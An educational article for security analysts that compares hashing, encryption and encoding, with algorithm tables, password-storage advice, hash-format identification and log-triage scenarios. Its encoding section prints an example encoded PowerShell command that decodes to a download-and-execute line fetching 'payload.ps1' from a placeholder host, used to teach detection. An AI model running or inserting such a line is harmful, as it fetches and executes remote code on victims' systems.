Fundamentals

T1003, T1555

Hashing vs Encryption vs Encoding

The critical differences between hashing, encryption, and encoding — algorithm comparisons, real-world use cases, breach analysis applications, and concepts every analyst must understand to interpret logs and talk to engineering teams.


The Three Concepts — Hashing, Encryption, Encoding

These three concepts are among the most commonly confused terms in security. Analysts who use them incorrectly lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:

| Concept | Direction | Key Required? | Deterministic? | Reversible? | Purpose |
| --- | --- | --- | --- | --- | --- |
| Hashing | One-way | No | Yes (same input = same hash) | No (mathematically infeasible) | Integrity verification, password storage |
| Encryption | Two-way | Yes (symmetric or asymmetric) | Usually no (a random IV or nonce changes the ciphertext each time) | Yes (with the key) | Confidentiality |
| Encoding | Both directions | No | Yes (always) | Yes (trivial, anyone can decode) | Data format transformation |

The Critical Distinction

Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.

Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.

Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved: encoding is not security. Analysts often mistake encoded data (especially Base64) for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.
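As a rough illustration of the distinction, the sketch below contrasts encoding and hashing using only the Python standard library. Encryption is left out because the standard library ships no cipher; the variable names are illustrative only.

```python
import base64
import hashlib

secret = b"password"

# Encoding: anyone can reverse it, no key involved.
encoded = base64.b64encode(secret)
decoded = base64.b64decode(encoded)

# Hashing: deterministic and fixed-length, with no "decode" operation at all.
digest_1 = hashlib.sha256(secret).hexdigest()
digest_2 = hashlib.sha256(secret).hexdigest()

print(encoded.decode())       # cGFzc3dvcmQ=
print(decoded == secret)      # True
print(digest_1 == digest_2)   # True
print(len(digest_1))          # 64
```

The only way back from the digest to the input is to guess candidate inputs and hash each one.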

Hashing — One-Way Integrity Verification

How Hashing Works

A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).

Input: "password123"
SHA-256: ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f

Input: "Password123"  (capital P)
SHA-256: a different 64-hex-character digest with no visible relationship to the one above
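The fixed-length and avalanche properties can be checked directly. This is a minimal sketch using Python's hashlib; the helper names are made up for illustration.

```python
import hashlib


def sha256_bytes(text: str) -> bytes:
    """Return the raw 32-byte SHA-256 digest of a UTF-8 string."""
    return hashlib.sha256(text.encode("utf-8")).digest()


def differing_bits(a: bytes, b: bytes) -> int:
    """Count the bit positions where two equal-length digests differ."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


lower = sha256_bytes("password123")
upper = sha256_bytes("Password123")   # only the case of the first letter changes
short = sha256_bytes("a")

print(lower.hex())
print(upper.hex())
print(len(lower), len(upper), len(short))   # 32 32 32
print(differing_bits(lower, upper), "of 256 bits differ")
```

For a well-behaved hash function, roughly half of the 256 output bits should flip for any change in the input.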

Common Hash Algorithms — Comparison

| Algorithm | Digest Size | Security Status | Use Case |
| --- | --- | --- | --- |
| MD5 | 128 bits (32 hex chars) | Broken: practical collision attacks (2008 rogue CA certificate, 2012 Flame malware) | Legacy compatibility only. Do not use for security. |
| SHA-1 | 160 bits (40 hex chars) | Broken: the SHAttered attack (2017) demonstrated a practical collision | Deprecated. Avoid in all security contexts. |
| SHA-256 | 256 bits (64 hex chars) | Secure | The current standard for file integrity, TLS certificates, and blockchain. Too fast to use on its own for password storage, even with a salt. |
| SHA-512 | 512 bits (128 hex chars) | Secure | Larger digest and security margin than SHA-256. Can be faster than SHA-256 on 64-bit CPUs that lack SHA hardware extensions. |
| SHA-3 | Variable (224/256/384/512 bits) | Secure | Newest NIST hash standard. Different internal structure than SHA-2 (sponge construction). Future-proofing. |
| bcrypt | 184-bit hash (60-character encoded string) | Secure | Designed for password hashing. Includes embedded salt and configurable work factor. Deliberately slow, which is what password storage needs. |
| scrypt | Variable (configurable output length) | Secure | Password hashing designed to be memory-hard (resists GPU/ASIC cracking). |
| Argon2id | Variable (configurable output length) | Secure (recommended by OWASP) | Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, with configurable time, memory, and parallelism costs. |
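To make the password-hashing rows concrete, here is a minimal sketch of salted, memory-hard hashing with hashlib.scrypt from the Python standard library. The cost parameters and function names are assumptions chosen for illustration, not a tuning recommendation.

```python
import hashlib
import hmac
import os

# Hypothetical cost parameters for illustration; tune them for real hardware.
SCRYPT_PARAMS = {"n": 2**14, "r": 8, "p": 1, "dklen": 32}


def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest) using a fresh random salt per password."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected)


salt, digest = hash_password("hunter2")
print(verify_password("hunter2", salt, digest))   # True
print(verify_password("hunter3", salt, digest))   # False
```

Because the salt is random, hashing the same password twice yields two different digests, which is what defeats precomputed tables.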

Password Hashing — The Right Way

When investigating a credential theft, the first question is: were the passwords properly hashed?

Bad (reversible or trivial):

$ echo "cGFzc3dvcmQ=" | base64 -d
password

Base64 is not hashing. Passwords that appear Base64-encoded in a breach dump were effectively stored in plaintext.

Better but still wrong:

plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99

MD5 is fast. A single modern GPU can compute tens of billions of MD5 hashes per second, so running the RockYou wordlist (about 14 million passwords) against unsalted MD5 hashes takes seconds.
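The attack itself is nothing more than hashing guesses and comparing. A minimal sketch follows; the five-word list is a stand-in for a real wordlist such as RockYou, and crack_md5 is a made-up helper name.

```python
import hashlib


def crack_md5(target_hex, candidates):
    """Return the first candidate whose MD5 digest matches, else None."""
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target_hex:
            return word
    return None


# Tiny illustrative wordlist; a real attack would stream millions of entries.
wordlist = ["123456", "qwerty", "letmein", "password", "dragon"]
print(crack_md5("5f4dcc3b5aa765d61d8327deb882cf99", wordlist))   # password
```

With no salt, one pass over the wordlist tests every account in the dump at once.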

Good:

plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy

The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 = 1,024 key-expansion rounds). The next 22 characters are the salt, embedded in the output, and the final 31 characters are the hash itself. Each password gets a different salt, so precomputed rainbow tables are useless.
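The fields of a bcrypt string can be pulled apart with plain string handling. This sketch assumes the standard 60-character layout (prefix, two-digit cost, 22-character salt, 31-character hash); parse_bcrypt is a hypothetical helper, not part of any library.

```python
def parse_bcrypt(hash_string: str) -> dict:
    """Split a bcrypt string into version, cost, salt, and hash fields."""
    _, version, cost, payload = hash_string.split("$")
    if version not in {"2a", "2b", "2y"} or len(payload) != 53:
        raise ValueError("not a recognised bcrypt string")
    return {
        "version": version,
        "cost": int(cost),
        "rounds": 2 ** int(cost),   # key-expansion iterations
        "salt": payload[:22],       # bcrypt-flavoured Base64, not standard Base64
        "hash": payload[22:],
    }


fields = parse_bcrypt("$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy")
print(fields["cost"], fields["rounds"])   # 10 1024
print(fields["salt"])                     # N9qo8uLOickgx2ZMRZoMye
```

In a breach review, the cost field is worth recording: a low cost makes even bcrypt hashes cheaper to attack.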

Identifying Hash Types in Breach Data

When you see a hash in a breach report, identify the algorithm by format:

| Format | Likely Algorithm | Length |
| --- | --- | --- |
| $1$salt$hash | MD5-crypt (Unix) | Variable |
| $2a$ / $2b$ / $2y$ | bcrypt | 60 chars (includes cost + salt) |
| $5$ | SHA-256-crypt (Unix) | Variable |
| $6$ | SHA-512-crypt (Unix) | Variable |
| {MD5}base64hash | Unsalted MD5 (OpenLDAP) | 24 Base64 chars |
| {SSHA}base64hash | Salted SHA-1 (LDAP) | Variable (Base64) |
| 32 hex characters | NTLM (MD4-based), MD5, or MD2 | 32 |
| 40 hex characters | SHA-1 | 40 |
| 64 hex characters | SHA-256 | 64 |
| $argon2id$v=19$... | Argon2id | Variable |

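Tools like hashid and hash-identifier can suggest candidate hash types automatically. Several algorithms share the same length and character set, so treat the output as a shortlist and confirm it against the source system.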
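A first-pass classifier along the lines of the format table can be sketched in a few lines. The prefix and length lists below are illustrative and far from exhaustive, and guess_hash_type is a hypothetical name, not the interface of hashid or hash-identifier.

```python
import re

# (prefix, label) pairs checked in order; illustrative, not exhaustive.
PREFIXES = [
    ("$argon2id$", "Argon2id"),
    ("$2a$", "bcrypt"),
    ("$2b$", "bcrypt"),
    ("$2y$", "bcrypt"),
    ("$1$", "MD5-crypt"),
    ("$5$", "SHA-256-crypt"),
    ("$6$", "SHA-512-crypt"),
    ("{SSHA}", "Salted SHA-1 (LDAP)"),
]
HEX_LENGTHS = {32: "NTLM, MD5, or MD2", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def guess_hash_type(value: str) -> str:
    """Return a likely algorithm label based on prefix or hex length."""
    for prefix, label in PREFIXES:
        if value.startswith(prefix):
            return label
    if re.fullmatch(r"[0-9a-fA-F]+", value):
        return HEX_LENGTHS.get(len(value), "unknown")
    return "unknown"


print(guess_hash_type("5f4dcc3b5aa765d61d8327deb882cf99"))   # NTLM, MD5, or MD2
print(guess_hash_type("$6$somesalt$somehash"))               # SHA-512-crypt
```

Length alone cannot separate MD5 from NTLM, which is why the 32-character case returns several candidates.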

Encryption — Two-Way with a Key

Types of Encryption

Symmetric Encryption — Same key for encryption and decryption.

| Algorithm | Key Size | Security | Use Case |
| --- | --- | --- | --- |
| AES-128 | 128 bits | Secure | Disk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs. |
| AES-256 | 256 bits | Secure | Highest standard. Required for TOP SECRET US government data (NSA Suite B and its successor, CNSA). Slightly slower than AES-128. |
| ChaCha20 | 256 bits | Secure | Modern stream cipher. Preferred over AES on devices without hardware AES acceleration, such as older mobile chips. Used in TLS 1.3, WireGuard, SSH. |
| DES | 56 bits | Broken | 56-bit keys can be brute-forced in under 24 hours. Do not use. |
| 3DES | 112 or 168 bits (about 112-bit effective strength) | Deprecated | 64-bit block size makes it vulnerable to the Sweet32 attack (2016). Do not use. |
| Blowfish | 32-448 bits | Weak (block size) | 64-bit block size makes it vulnerable to birthday attacks after about 32 GB of data under one key. Use AES instead. |
| Twofish | 128-256 bits | Secure | AES finalist. Less common but still secure. |
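The 32 GB figure for 64-bit block ciphers comes from the birthday bound: collisions between ciphertext blocks become likely after about 2^(n/2) blocks for an n-bit block. The arithmetic can be sketched as follows; the function name is illustrative.

```python
def birthday_bound_bytes(block_bits: int) -> int:
    """Approximate data volume (in bytes) at which block collisions become likely."""
    blocks = 2 ** (block_bits // 2)       # about 2^(n/2) blocks
    return blocks * (block_bits // 8)     # times the block size in bytes


print(birthday_bound_bytes(64) / 2**30)    # 32.0  (GiB, for DES, 3DES, Blowfish)
print(birthday_bound_bytes(128) / 2**60)   # 256.0 (EiB, for AES)

# Size of the DES key space that a brute-force search has to cover.
des_keyspace = 2 ** 56
print(des_keyspace)                        # 72057594037927936
```

This is why block size, and not only key length, determines whether a cipher is still safe for bulk data.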

Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts. For digital signatures the roles reverse: the private key signs and the public key verifies.

| Algorithm | Key Size | Security | Use Case |
| --- | --- | --- | --- |
| RSA | 2048-4096 bits | Secure at 2048+ | TLS certificates, PGP, SSH (legacy). Slow, so typically used to encrypt symmetric keys rather than bulk data. |
| ECC | 256-521 bits | Secure | Modern alternative to RSA. Much smaller keys (256-bit ECC = 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin. |
| DSA | 1024-3072 bits | Deprecated | Old NIST standard. Largely replaced by ECDSA. |
| Diffie-Hellman | 2048+ bits | Secure (with proper groups) | Key exchange only, not encryption. Foundation of TLS key agreement. |
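To show why Diffie-Hellman is key exchange and not encryption, here is a toy run with textbook-sized numbers. The prime, generator, and private values are deliberately tiny and fixed for readability; real deployments use random secrets and groups of 2048 bits or more.

```python
# Toy public parameters (insecure, for illustration only).
p = 23   # prime modulus
g = 5    # generator

# Private values; in practice these are large random numbers.
a_private = 4
b_private = 3

# Each side publishes g^private mod p.
a_public = pow(g, a_private, p)
b_public = pow(g, b_private, p)

# Each side combines its own private value with the other side's public value.
a_shared = pow(b_public, a_private, p)
b_shared = pow(a_public, b_private, p)

print(a_public, b_public)    # 4 10
print(a_shared, b_shared)    # 18 18
```

Nothing was encrypted here: both sides simply arrive at the same number, which then seeds a symmetric cipher.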

Real-World Encryption Examples

TLS — Transport Layer Security

  • Client connects to an https:// URL
  • Server sends its RSA or ECDSA certificate (signed by a CA)
  • Client and server perform key exchange (ECDHE handshake)
  • Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
  • All data encrypted for the duration of the session

Disk Encryption (BitLocker)

  • Writes: data encrypted with AES-128/256 before writing to disk
  • Reads: data decrypted from disk into memory
  • Key: TPM-protected or recovery key
  • Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification

PGP / Age

  • File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
  • Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
  • Real-world: secure file transfer, encrypted email, Git commit signing

Encoding — Just a Format Change

Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.

Common Encoding Schemes

| Scheme | Purpose | Example (output for “password” unless noted) |
| --- | --- | --- |
| Base64 | Binary → ASCII for safe transmission over text protocols | cGFzc3dvcmQ= |
| Hex | Binary → hexadecimal representation | 70617373776f7264 |
| URL encoding | Special characters in URLs | passw%6Frd (o → %6F) |
| HTML entities | Prevent HTML injection | &lt;script&gt; for <script> |
| Unicode escapes | Escaping special Unicode characters | \u0070\u0061\u0073... |
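Each scheme in the table can be reproduced with the Python standard library. This is a small sketch; the URL-encoding input "a b&c" is a made-up example chosen because it contains characters that actually need escaping.

```python
import base64
import html
import urllib.parse

text = "password"
raw = text.encode("utf-8")

b64 = base64.b64encode(raw).decode("ascii")
hexed = raw.hex()
url = urllib.parse.quote("a b&c")
entity = html.escape("<script>")
escapes = "".join(f"\\u{ord(ch):04x}" for ch in text)

print(b64)       # cGFzc3dvcmQ=
print(hexed)     # 70617373776f7264
print(url)       # a%20b%26c
print(entity)    # &lt;script&gt;
print(escapes)
```

Every one of these has an equally simple inverse, which is the point: none of them protects the data.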

What Analysts Commonly See

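Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator: decode it to see what actually ran. The encoded payload is UTF-16LE text, so a plain Base64 decode shows a null byte after every ASCII character.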

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=

Decode it:

echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8

Result:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')
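The same decode can be scripted for bulk log triage. A minimal sketch in Python, using the encoded string from the example above:

```python
import base64

encoded_command = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA="

# -EncodedCommand payloads are UTF-16LE, so decode the bytes accordingly.
decoded_command = base64.b64decode(encoded_command).decode("utf-16-le")
print(decoded_command)
```

Decoding as UTF-8 instead would leave a null byte between characters, a common source of confusion when reading these payloads.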

Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.

URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.
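Both decodes are one-liners in Python's standard library, sketched here with the two example values from the text:

```python
import urllib.parse

# Hex bytes as they appear in a memory dump (spaces are ignored by fromhex).
process_name = bytes.fromhex("65 78 70 6C 6F 72 65 72").decode("ascii")

# Percent-encoded prefix as it appears in a proxy log.
url_prefix = urllib.parse.unquote("%68%74%74%70%73%3A%2F%2F")

print(process_name)   # explorer
print(url_prefix)     # https://
```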

Putting It All Together — Analysts’ Quick Reference

Scenario: You Find JDJhJDEwJE5ROW5qOHVMT2lj... in a Data Breach Dump

  1. Check format. The string itself is Base64; decoding it gives a value that starts with $2a$10$ → a bcrypt hash that was Base64-wrapped for storage or export. Good: the password was properly hashed.
  2. If the value is cGFzc3dvcmQ= → Base64 that decodes to password. Not hashed: the site stored plaintext credentials encoded as Base64. Immediate escalation.
  3. If the value is 5f4dcc3b5aa765d61d8327deb882cf99 (32 hex chars) → MD5 or NTLM. Weak and likely crackable, but at least the site stored a hash.
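The sample string in the scenario heading is itself Base64, so the first triage step is to unwrap it and look at what is inside. The sketch below uses only the visible part of that string (the rest is elided in the source); triage is a hypothetical helper and its labels are illustrative.

```python
import base64
import binascii
import re


def triage(value: str) -> str:
    """Classify a breach-dump value as hex hash, wrapped bcrypt, or encoded plaintext."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "32 hex chars: MD5 or NTLM"
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return "unknown"
    if decoded.startswith(("$2a$", "$2b$", "$2y$")):
        return "Base64-wrapped bcrypt: " + decoded
    return "Base64-encoded plaintext: " + decoded


visible_prefix = "JDJhJDEwJE5ROW5qOHVMT2lj"   # only the part shown before the ellipsis
print(triage(visible_prefix))
print(triage("cGFzc3dvcmQ="))
print(triage("5f4dcc3b5aa765d61d8327deb882cf99"))
```

The hex check runs first because hex characters are also valid Base64 characters, and a 32-character hex string would otherwise be decoded as Base64.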

Scenario: You See an Encrypted Communication Log

  1. Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
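  2. Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. The protocol version is deprecated (RFC 8996), RC4 is prohibited in TLS (RFC 7465), and RSA key exchange provides no forward secrecy. Needs remediation.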
  3. If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.
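A first-pass check of protocol and cipher-suite names from connection logs could look like the sketch below. The marker lists are illustrative assumptions and not a complete policy, and assess is a hypothetical helper name.

```python
# Illustrative, non-exhaustive lists; a real policy would come from your standards.
WEAK_MARKERS = ("RC4", "3DES", "DES", "NULL", "EXPORT", "MD5")
DEPRECATED_PROTOCOLS = {"SSLv3", "TLS 1.0", "TLS 1.1"}


def assess(protocol: str, cipher_suite: str) -> list:
    """Return a list of findings for one logged TLS connection."""
    findings = []
    if protocol in DEPRECATED_PROTOCOLS:
        findings.append(f"deprecated protocol {protocol}")
    tokens = cipher_suite.split("_")
    findings.extend(f"weak primitive {m}" for m in WEAK_MARKERS if m in tokens)
    return findings or ["no known weakness flagged"]


print(assess("TLS 1.3", "TLS_AES_256_GCM_SHA384"))
print(assess("TLS 1.0", "TLS_RSA_WITH_RC4_128_SHA"))
```

Matching on whole underscore-separated tokens avoids flagging a suite just because a weak name appears as a substring of something else.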

Sources